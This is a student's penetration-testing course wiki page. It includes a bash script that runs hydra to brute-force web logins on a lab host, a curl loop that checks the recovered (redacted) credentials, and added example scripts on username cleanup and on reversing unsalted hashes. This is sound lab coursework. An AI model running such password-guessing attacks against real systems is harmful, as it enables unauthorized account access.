Working Notes: SEC335: Week 5 - eliminmax/cncs-journal GitHub Wiki

Week 5

Overview

Did Lab 5.1, Assignment 5.1, and Reading 5.1

Lab 5.1

The hardest part for me was coming up with a way to display the results of using hydra neatly. I wound up writing the following script:

#!/usr/bin/env bash

# took me a bit of work to figure out a way to shorten hydra's output, and by piping it, it loses its color.
# The following filters out all lines that don't announce that a match was found, and adds the color back.
# The sed expressions use what I believe is a bashism: while '\e' is evaluated literally as a backslash and
# a lowercase e, $'\e' evaluates as an escape character. That means that some backslashes must be doubled
# to work properly, but it still highlights properly.

# The first sed expression deletes lines that do not contain the pattern 'password:'.
# The second encloses characters within square brackets with an escape code to output them in bold green.
# The third does something similar, but for sequences of non-space characters following the characters ': '.

for user in bilbo frodo pippin samwise; do
  hydra -l "$user" -P "mangled_wordlist_$user" http-get://10.0.5.21/admin/ 2>/dev/null |\
    sed -e '/password:/!d' \
        -e $'s/\[\([^]]*\)/[\e[1;32m\\1\e[m/g' \
        -e $'s/: \([^ ]*\)/: \e[1;32m\\1\e[m/g'
done

# I already had the answers when writing this, but I couldn't fit them cleanly together in a screenshot.
# The following loop tests that the passwords worked. The fakeuser:fakepass is there to demonstrate that
# it properly reports failure.

for cred in bilbo:████████████ frodo:████████████ pippin:████████████ samwise:████████████ fakeuser:fakepass; do
  # split "user:pass" on the first colon with parameter expansion instead of
  # echo | tr, so a password containing spaces still arrives as one argument
  user="${cred%%:*}"
  pass="${cred#*:}"
  # -s silent, -f exit non-zero on HTTP errors (401 for bad credentials)
  if curl -sf -u "$cred" http://10.0.5.21/admin/ &>/dev/null ; then
    printf 'Username \e[1;38;5;46m%s\e[m with password \e[1;38;5;46m%s\e[m worked!\n' "$user" "$pass"
  else
    printf 'Username \e[1;38;5;124m%s\e[m with password \e[1;38;5;124m%s\e[m failed!\n' "$user" "$pass" >&2
  fi
done

I've replaced the 9-12 character passwords with 12 full-block characters. I'm writing this page in Neovim, and the way that I did that was typing the following in normal mode: 12i<ctrl+k>FB<esc>. In insert mode, entering ctrl+k followed by 2 characters inserts another character that might not be easily typed. The available combinations can be listed with :digraphs. I recently learned about that and think it's neat, and useful to redact the passwords in case any classmates hope to get the answer off of my wiki.

As for the use of cewl, rsmangler, and hydra itself, I already have those notes from last semester. I did, however, adjust the formatting, rename the file they are stored in, and add a bit to the section on hydra. The notes can be found at Penetration Testing: Password Guessing and Cracking § Password Guessing

Assignment 5.1

I actually did this at the very beginning of the semester, sort of. Instead of changing the root password, I renamed the default champuser account to eliminmax, using the process I described years ago in the Linux: Change Account Username page on this very wiki. I then searched the file system for any file containing the string champuser and decided whether or not to replace it: if it referred to the /home/champuser directory or dealt with user or group permissions like /etc/subuid, I replaced or deleted it, whichever was appropriate. I figured that, worst-case scenario, I'd need to go back into single-user mode to fix things. It worked out fine.
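The stale-reference search described above, written out as a script. This is an added example, not code from the original page or from the linked account-rename page: it builds a constructed directory tree standing in for a real filesystem, lists every file that still mentions the old username, sorts the hits into ones that should be rewritten (uid/gid maps such as /etc/subuid, anything pointing at the old home directory) and ones that need a human decision, then rewrites only the first group while keeping a backup of each file. The function names, demo paths and file contents are assumptions made for the demo.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: after an account has been renamed,
# find every file that still mentions the old username and sort the hits into
# the two buckets described above. The tree built by make_demo_tree is a
# constructed stand-in for a real filesystem; on a real host you would call
# audit_user_refs / champuser (with /proc, /sys and /dev excluded, as below).
set -eu

# make_demo_tree ROOT: constructed sample files, not taken from any real system
make_demo_tree() {
  local root="$1"
  mkdir -p "$root/etc" "$root/home/champuser" "$root/var/log"
  printf 'champuser:100000:65536\n'                    > "$root/etc/subuid"
  printf 'champuser:100000:65536\n'                    > "$root/etc/subgid"
  printf 'export PROJECTS=/home/champuser/projects\n'  > "$root/home/champuser/.profile"
  printf 'sshd[1]: Accepted publickey for champuser\n' > "$root/var/log/auth.log"
  printf 'lab-vm\n'                                    > "$root/etc/hostname"
}

# audit_user_refs ROOT OLDNAME: prints "<bucket><TAB><path relative to ROOT>"
# for every text file under ROOT containing OLDNAME. Bucket "rewrite" covers
# uid/gid maps and references to the old home directory; "review" is everything
# else (logs, comments, ...), which needs a human decision.
audit_user_refs() {
  local root="${1%/}" old="$2" f rel bucket
  # -r recurse, -I skip binaries, -l names only, -F fixed string (GNU grep)
  grep -rIlF --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev \
       -- "$old" "${root:-/}" 2>/dev/null | LC_ALL=C sort |
  while IFS= read -r f; do
    rel="${f#"$root"}"
    case "$rel" in
      /etc/subuid|/etc/subgid) bucket=rewrite ;;
      *) if grep -qF "/home/$old" "$f"; then bucket=rewrite; else bucket=review; fi ;;
    esac
    printf '%s\t%s\n' "$bucket" "$rel"
  done
}

# rewrite_refs ROOT OLDNAME NEWNAME: substitutes only in the "rewrite" bucket,
# keeping <file>.bak so a wrong edit is undone with mv, not from single-user mode.
rewrite_refs() {
  local root="${1%/}" old="$2" new="$3" bucket rel tab
  tab="$(printf '\t')"
  audit_user_refs "$root" "$old" |
  while IFS="$tab" read -r bucket rel; do
    [ "$bucket" = rewrite ] || continue
    sed -i.bak "s|$old|$new|g" "$root$rel"
  done
}

# Demo run on the constructed tree
demo_root="$(mktemp -d)"
make_demo_tree "$demo_root"
audit_user_refs "$demo_root" champuser
rewrite_refs "$demo_root" champuser eliminmax
# only the log line (left for review) and the .bak copies still say champuser
grep -rlF champuser "$demo_root"
rm -rf "$demo_root"
```

The substitution is a plain fixed-string replace, so a username that is a prefix of another word (or of another account name) should be checked in the "review" output before it is added to the rewrite bucket.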

Reading 5.1

Not much to say - I had to find a password from a password list like the notorious rockyou.txt, and show Google searches for its MD5 and SHA-256 sums.
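Why that Google search works, as an added example that is not part of the original page: an unsalted MD5 or SHA-256 of a wordlist entry is a fixed string, so anyone who has hashed the same wordlist once (or a search engine that indexed such a page) maps it straight back to the plaintext. The script builds that index for a constructed six-line stand-in for rockyou.txt, looks hashes up in it, and shows that a salted hash of the same password is not in the index. It uses GNU coreutils md5sum and sha256sum; the function names and the sample wordlist are assumptions made for the demo.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: why the MD5 or SHA-256 of a
# rockyou.txt entry is a Google search away. An unsalted hash of a common
# password is a fixed string; whoever hashed the same wordlist once can map it
# straight back to the plaintext. Uses GNU coreutils md5sum/sha256sum; the
# wordlist in the demo is a constructed stand-in for rockyou.txt.
set -eu

# digest ALGO STRING -> hex digest of STRING (no trailing newline is hashed,
# which matters: echo "password" | md5sum gives a different value)
digest() {
  case "$1" in
    md5)    printf '%s' "$2" | md5sum    | cut -d' ' -f1 ;;
    sha256) printf '%s' "$2" | sha256sum | cut -d' ' -f1 ;;
    *)      echo "digest: unknown algorithm $1" >&2; return 2 ;;
  esac
}

# build_table ALGO WORDLIST -> "<hash> <word>" per line: the precomputed index
# that a search engine (or a site it indexed) effectively holds for rockyou.txt
build_table() {
  local algo="$1" list="$2" w
  while IFS= read -r w; do
    printf '%s %s\n' "$(digest "$algo" "$w")" "$w"
  done < "$list"
}

# lookup HASH TABLE -> plaintext for HASH; exit status 1 if it is not indexed
lookup() {
  awk -v h="$1" '$1 == h { sub(/^[^ ]+ /, ""); print; found = 1 } END { exit !found }' "$2"
}

# Demo: constructed six-line "wordlist", index it both ways, then search it
wordlist="$(mktemp)"; md5_table="$(mktemp)"; sha_table="$(mktemp)"
printf '%s\n' 123456 password iloveyou princess 1234567 rockyou > "$wordlist"
build_table md5    "$wordlist" > "$md5_table"
build_table sha256 "$wordlist" > "$sha_table"

lookup 5f4dcc3b5aa765d61d8327deb882cf99 "$md5_table"          # password
lookup "$(digest sha256 123456)" "$sha_table"                  # 123456
# A per-user salt turns the same password into a hash no table holds:
lookup "$(digest sha256 "s4lt:password")" "$sha_table" || echo 'salted: no match'
rm -f "$wordlist" "$md5_table" "$sha_table"
```

For the real list the index is built once (rockyou.txt is about 14 million lines, so build_table takes a while in shell, but it only has to happen once) and every later lookup is a single awk pass; that asymmetry is the whole reason unsalted fast hashes of dictionary passwords are considered equivalent to plaintext.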
